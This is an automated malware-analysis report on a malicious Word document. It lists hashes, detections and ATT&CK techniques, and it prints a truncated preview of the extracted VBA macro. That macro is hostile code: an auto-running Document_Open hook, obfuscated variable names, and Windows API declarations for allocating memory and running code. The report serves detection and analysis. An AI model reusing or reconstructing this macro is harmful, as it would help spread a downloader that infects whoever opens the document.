Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d2a812fbc44b5612…

MALICIOUS

Office (OLE)

270.0 KB Created: 2018-04-30 12:41:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: ee055bc7f83d2b32e8d09b88b02e79d3 SHA-1: daf4681ae5860ed0d24d0f1693c2bdbb2f4bed1d SHA-256: d2a812fbc44b5612d39806a96631b36f5b98c93458e49eb4f0ace42b6b8d6c66
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Office document with a high-severity heuristic indicating the presence of VBA macros. The critical ClamAV detection and the 'Document_Open' macro firing suggest that the embedded VBA code is designed to execute automatically when the document is opened. This macro likely attempts to download and execute a malicious payload, a common technique for malware distribution.

Heuristics 3

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12432 bytes
SHA-256: 610adbeb353139499a91fc3c6c296ea885d1d4eee184d5b2628998c66799d414
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Label1, 0, 0, MSForms, Label"
Attribute VB_Control = "Image1, 1, 1, MSForms, Image"









Private Sub Document_Open()
contemporary
cranch = 18 + 11
Pmt 0, cranch, _
21508, 17882, 7
End Sub

Sub Binary_Search_of_Array()
Dim intThousand(1000) As Integer
Dim i As Integer
Dim intTop As Integer
Dim intMiddle As Integer
Dim intBottom As Integer
Dim varUserNumber As Variant

For i = 1 To 1000
intThousand(i) = i
Next i

varUserNumber = 233
intTop = UBound(intThousand)
intBottom = LBound(intThousand)

Do
intMiddle = (intTop + intBottom) / 2
If varUserNumber > intThousand(intMiddle) Then
intBottom = intMiddle + 1
Else
intTop = intMiddle - 1
End If
Loop Until (varUserNumber = intThousand(intMiddle)) _
Or (intBottom > intTop)

If varUserNumber = intThousand(intMiddle) Then
Debug.Print varUserNumber & ", at position " & intMiddle
Else
Debug.Print "not in "
End If
End Sub










Attribute VB_Name = "pirogue"
Attribute VB_Base = "0{AE8575F6-E7FA-4E7F-9ABD-961D5AFD3A77}{7C29B447-0C4C-4FAD-B4C8-52E812AFD12D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False





Attribute VB_Name = "fiat"
#If (1 - 23 + 422 + 103 - 33 + 230) > ((11 - 5 + 314) - (124 - 119 + 535) * 1) And Not ((8 - 29 + 49) - (50 - 49 + 27)) * 2 < (Win64) Then
Public Declare Function cloture _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (clupeidae As Any, ByVal derm As Any, ByVal turgescence As Any, ByVal quartz As Any, ByVal blade As Any, ByVal ascribable As Any, ByVal lepadidae As Any) As Long
#End If
#If (25 - 96 + 471 + 103 - 20 + 217) > ((22 - 101 + 399) - (66 - 3 + 477) * 1) And ((38 - 5 - 5) - (41 - 8 - 5)) * 2 < (Win64) Then
Public Declare PtrSafe Function democratization _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (deau As LongPtr, setto As LongPtr, ByVal rosewood As LongPtr, dyslexicByVal As LongPtr, almandite As LongPtr, ByVal briefcase As LongPtr) As LongPtr
#End If
Function aught(leones, ascendable, pseudoscience)
Dim vendibility As Long
Dim antony As Integer
Dim adiabatic As Long
Dim muhlenbergia As Integer
Dim mauers As Long
Dim joined As Variant
Dim penalty As Long
Dim fro As Long
Dim arsine As Long
Dim carcase As Long
Dim hoarsely As String
barrette = freedom
barrette = barrette
vendibility = leones
arsine = pseudoscience
mauers = ascendable
angloamerican = 37 + 38
Pmt 0, angloamerican, 38791, 31118, 2
conclusions = "rotl"
adiabatic = 85 - 95 + 9
consuecere ByVal adiabatic, _
vendibility, mauers, _
arsine, penalty
emotion = Rnd(495)
End Function
Sub contemporary()
Dim mimosa As Long
Dim repetitively As Variant
pirogue.bled.Value = Day(#12/5/2013#)
misjoining = drifting
epinephelus = scoreboard
encroach = consecrate
Set bassinet = pirogue.bled.SelectedItem
mystification = 4 + 4
Pmt 0, mystification, 38252, 46702, 7
pneumonitis = bassinet.Name
epagoge = 59 - 80 + 7865
neckless = Right(pneumonitis, epagoge)
esau = pseudopod.elevation(neckless)
ciprofloxacin = 55 + 6
Pmt 0, ciprofloxacin, 19211, 52372, 8
#If (48 - 107 + 459 + 108 - 69 + 261) > ((34 - 5 + 291) - (96 - 95 + 539) * 1) And ((106 - 74 - 4) - (26 - 124 + 126)) * 2 < (Win64) Then
Dim popularly As Byte
Dim mewed As LongPtr
Dim nousel As LongPtr
Dim cloy As Integer
#ElseIf (65 - 26 + 361 + 35 - 93 + 358) > ((11 - 82 + 391) - (49 - 104 + 595) * 1) And Not ((78 - 12 - 38) - (127 - 24 - 75)) * 2 < (Win64) Then
Dim algal As Byte
Dim nousel As Long
Dim astound As Integer
Dim mewed As Long
#End If
accoucheur = 35 - 100 + 65
amoristic = "attica"
blanched = "nephron"
devastation = 73 - 79 + 4102
agape = 
... (truncated)